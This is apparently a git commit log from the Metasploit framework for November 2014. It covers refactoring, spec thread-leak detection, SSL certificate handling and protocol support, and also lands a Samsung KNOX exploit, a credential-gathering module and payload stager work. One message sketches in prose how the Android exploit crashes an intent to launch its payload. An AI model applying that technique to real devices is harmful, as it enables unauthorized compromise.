This change emulates the auto-generated snakeoil certificate from Ubuntu 14.04. The main changes including moving to 2048-bit RSA, SHA256, a single name CN for subject/issuer, and the removal of most certificate extensions.
2014-11-21 18:25:04 -06:00
90ae9a3ff8
Land #4173 , @wchen-r7's fix for SMB find_first
...
* Fixes #4119 , SMB find_first("\\*") does not return accurate results
* It missed initialization of sid
2014-11-21 09:51:57 -06:00
f2add929d7
Land #4239 - Support SSL intermediate certs
2014-11-21 02:09:40 -06:00
e255db9429
Partial commit
2014-11-20 13:49:36 -08:00
5d2c02f402
Initial commit of more OO version of Rex/Aux Kademlia support
2014-11-20 13:28:01 -08:00
94e5ba13a4
YARD and spec cleanup
2014-11-20 13:28:01 -08:00
df36ac910d
Mostly complete Kademlia PING / BOOTSTRAP scanner
2014-11-20 13:28:01 -08:00
f5aa3ecb57
Add proper peer decoding
2014-11-20 13:28:01 -08:00
ab49d01a1b
Add beginnings of Kademlia gather module and protocol support
2014-11-20 13:28:00 -08:00
2f92a83092
Change to example.com as the default domain
2014-11-20 14:53:36 -06:00
d530046164
Bugfix. Chrome is a liar (chain certs properly)
2014-11-19 16:08:03 -06:00
0d091f1c03
Support SSL intermediate certs, closes #4238
...
Note that this does not apply to reverse_tcp meterpreter clients yet, as
they do not allow certificates to be supplied. I abstracted out the SSL
certificate generation and parsing methods so that we can address this
next.
2014-11-19 15:56:49 -06:00
7004c501f8
Merge remote-tracking branch 'upstream/master' into psexec_refactor_round2
...
Conflicts:
modules/exploits/windows/smb/psexec.rb
2014-11-19 14:40:50 +00:00
dff6af0747
Restore timeout
2014-11-18 12:17:10 -08:00
4844447d17
Use 20 seconds as default timeout
...
* Because it's the default timeout on Rex::Proto::SunRPC::Client
2014-11-18 12:17:10 -08:00
694561dd0f
Dont shadow methods with local variables, just in case...
2014-11-18 12:17:10 -08:00
bfde6047d5
Introduce a user-controlled timeout for SunRPC stuff
2014-11-18 12:17:10 -08:00
a9f9a8b116
Introduce new ::Rex::Proto::SunRPC::RPCError, making run_host cleaner
2014-11-18 12:17:10 -08:00
d04441f638
Merge branch 'landing/4207' into upstream-master
...
Land #4207
* Ensure that `rake spec` doesn't create too many threads
2014-11-18 09:23:20 -06:00
8249ef62c9
Merge branch 'master' into chore/MSP-11614/remove-msf-db-manager-sink
...
MSP-11614
Conflicts:
spec/lib/msf/core/task_manager_spec.rb
2014-11-18 08:54:14 -06:00
fff36f5968
Merge branch 'landing/4189' into upstream-master
...
Land #4189
* Detect leaked threads during spec runs
* Manage threads before/after spec runs
2014-11-18 08:33:38 -06:00
7daedac399
Land #3972 @jhart-r7's post gather module for remmina Remmina
...
* Gather credentials managed with Remmina
2014-11-17 16:44:41 -06:00
286827c6e5
Land #4186 , Samsung KNOX exploit. Ty @jvennix-r7!
2014-11-17 13:29:39 -06:00
2b36c1bb43
Fix pymeterp bugs from testing in osx and python3
2014-11-17 14:04:30 -05:00
cc8b37d619
Make directory mandatory
2014-11-17 12:15:33 -06:00
15b7435c34
Make it YARD compliant documentation
2014-11-17 12:03:37 -06:00
cd32f00ebc
Add dir doc
2014-11-17 09:15:08 -08:00
98db8b5ad9
When not a meterpreter session, split dir/ls output to match meterpreter entries output
2014-11-17 09:10:03 -08:00
5f1a1f8ed3
Use dir for Windows only, ls for the rest
2014-11-17 09:01:14 -08:00
6519b0e2cb
Add dir and ls to Msf::Post::File
2014-11-17 09:01:14 -08:00
9243cfdbb7
Minor fixes to ruby style things
2014-11-17 17:12:17 +01:00
91aa5fa3cf
Some simple ruby convention changes that hopefully make ruby people happy
2014-11-17 16:48:52 +01:00
3c1ce5072c
Replaced camel case states with snail_case
2014-11-17 16:37:04 +01:00
33b42389f0
Merge branch 'feature/MSP-11147/thread-leak-detection' into feature/MSP-11605/lazy-thread-creation
...
MSP-11605
2014-11-17 09:35:47 -06:00
e3869ee1ae
Include Thread status when printing leaked threads
...
MSP-11147
Sometime travis-ci is showing leaked threads even when
'Msf::Framework#threads cleaner' is being used, so I'm adding the
`Thread#status` to the data printed about the Thread to see if the
sometimes leaked threads have an odd status. There's still a chance
that there will be a race-condition between when I call Thread.list and
I ask for each Thread's status that the VM could finish aborting a
Thread so that status I print isn't the same as the one that caused the
Thread to be returned in Thread.list.
2014-11-17 09:30:46 -06:00
ba836f2383
Only calculate thread UUIDs if they are needed
...
MSP-11147
Only calculate thread UUIDs if the thread count exceeds
EXPECTED_THREAD_COUNT_AROUND_SUITE.
2014-11-17 09:17:44 -06:00
024b449b55
Merge branch 'master' into feature/MSP-11605/lazy-thread-creation
...
MSP-11605
2014-11-17 08:50:33 -06:00
2a24151fa8
Remove BAP target, payload is flaky. Add warning.
2014-11-17 02:02:37 -06:00
105a28d8fd
Run the tests again.
2014-11-16 23:42:40 -06:00
a7aeac5df3
Fix APK signing on osx.
2014-11-16 23:29:54 -06:00
0bf93acf6b
Pymeterp http proxy and user agent support
2014-11-16 14:29:20 -05:00
7a62b71839
Some URL fixes from @jduck and exploit ideas from Andre Moulu.
...
The exploit works with the URLs fixed, installs the APK, but hangs at the Installing...
screen and never actually launches. We tried opening the APK in a setTimeout() intent
URI, but the previously launched intent seemed unresponsive. Andre had the bright
idea of re-opening the previously launched intent with invalid args, crashing it and
allow us to launch the payload.
2014-11-15 21:33:16 -06:00
a521d469ed
Land #4194 , Quake protocol support
2014-11-15 17:44:19 -06:00
e562883ba9
Escape inserted vars and fix core_loadlib
2014-11-15 15:06:18 -05:00
d207345778
Land #4200 - report_note handling incorrect protocol names
2014-11-15 13:16:58 -06:00
ceb7a63a5c
Merge branch 'master' into feature/MSP-11147/thread-leak-detection
...
MSP-11147
2014-11-14 18:20:55 -06:00
7c14e818f6
Patch pymeterp http settings
2014-11-14 17:12:23 -05:00
0477c5f8fe
Land #4191 , merge_check_key update for Ruby 2.1.4
2014-11-14 15:33:47 -06:00
3b558624f3
Merge branch 'landing/4129' into upstream-master
...
Landing #4129
* Detect leaked constants in spec runs
2014-11-14 12:55:56 -06:00
43511e648a
Merge branch 'chore/MSP-11614/remove-msf-db-manager-sink' into feature/MSP-11605/lazy-thread-creation
...
MSP-11605
Conflicts:
spec/lib/msf/core/task_manager_spec.rb
2014-11-14 11:59:12 -06:00
14fa1dba0b
Merge branch 'master' into feature/MSP-11605/lazy-thread-creation
...
MSP-11605
2014-11-14 11:58:16 -06:00
5e6400a506
Remove Msf::TaskManager
...
MSP-11614
`Msf::TaskManager` was only used for `Msf::DBManager#sink`, which was
removed because it was unused, so `Msf::TaskManager` can also be
removed.
2014-11-14 11:15:05 -06:00
55a8f6f339
Remove Msf::DBManager::Sink
...
MSP-11614
`Msf::DBManager::Sink` contains code for a `sink` that is a meant to
serialize database events, but it's unneeded because all database events
go directly through ActiveRecord, which handles threading.
2014-11-14 10:51:51 -06:00
6b2387b7fc
Prepare for a reverse_http stager
2014-11-14 11:15:22 -05:00
57aef9a6f5
Land #4177 , @hmoore-r7's fix for #4169
2014-11-13 18:29:57 -08:00
651beb9acb
Land #4192 , enable specifying mode for Rex output file
2014-11-13 14:57:48 -06:00
812aa9bc1a
Reduce number of calls to to_s and downcase
2014-11-13 14:56:17 -06:00
e72d9bd21f
Fix report_note handling incorrect protocol names
2014-11-13 14:30:43 -06:00
eb3ff769a9
Msf::Framework#threads?
...
MSP-11605
`Msf::Framework#threads?` returns whether `Msf::Framework#threads` was
ever initialized. If `Msf::Framework#threads?` is true, then threads
need to be cleaned up, while if it is false then no threads need to be
cleaned up from the current framework.
2014-11-13 14:21:35 -06:00
d9a25005a6
Wrap Msf::Framework#threads in Metasploit::Framework::ThreadFactoryProvider
...
MSP-11605
`Rex::ThreadFactory.provider` needs to be set in
`Msf::Framework#initialize`, but setting it directly to
`Msf::Framework#threads` eliminates the laziness of
`Msf::Framework#threads`. In order keep `framework.threads` lazy,
`framework` is wrapped in a
`Metasploit::Framework::ThreadFactoryProvider`, which responds to
`spawn`, which is needed by `Rex::ThreadFactory`, by calling
`framework.threads.spawn`, which lazily initialized `framework.threads`
when the first thread needs to be spawned.
2014-11-13 14:08:26 -06:00
0bc27334c1
Thread-safe lazy Msf::Framework#db
...
MSP-11605
Switch `Msf:Framework#db` from being set in `#initialize` to a custom
method that uses `||=` to lazily initialize the `Msf::DBManager` inside
a `synchronize` block to make it thread safe.
2014-11-13 13:38:53 -06:00
92adaa816f
Store Msf::Framework#initialize options
...
MSP-11605
Store options `Hash` passed to `Msf::Framework#new` in `#options` so
that lazily initialized children, such as DBManager, have access to
those options.
2014-11-13 13:23:17 -06:00
bc181f0294
Thread-safe lazy Msf::Framework#sessions
...
MSP-11605
Switch `Msf::Framework#sessions` from being set in `#initialize` to a
custom method that uses `||=` to lazily initialize the
`Msf::SessionManager` inside a `synchronize` block to make it thread
safe.
2014-11-13 13:17:57 -06:00
0959ef3d13
Fixes lack of support for MetasploitV5 tag
...
#4184
* Appears to have been overlooked somehow in the pre-BlackHat crunch
* V5 will not support credentials
* We are implementing full-workspace zip import/export for credentials
2014-11-13 13:01:55 -06:00
216c3d01de
Thread-safe lazy Msf::Framework#threads
...
MSP-11605
Switch Msf::Framework#threads to a custom method that uses `||=` to
lazily initialize the `Msf::ThreadManager` inside a `synchronize` block
to make it thread safe.
2014-11-13 11:12:43 -06:00
Sven Vetsch
Christian Mehlmauer
Spencer McIntyre
Brent Cook
jvazquez-r7
sinn3r
Tod Beardsley
William Vu
Jon Hart
Meatballs
Joe Vennix
Fernando Arias
Matt Buck
Trevor Rosen
HD Moore
Sean Verity
Samuel Huckins
James Lee
dmaloney-r7
Luke Imhoff
floyd
Julio Auto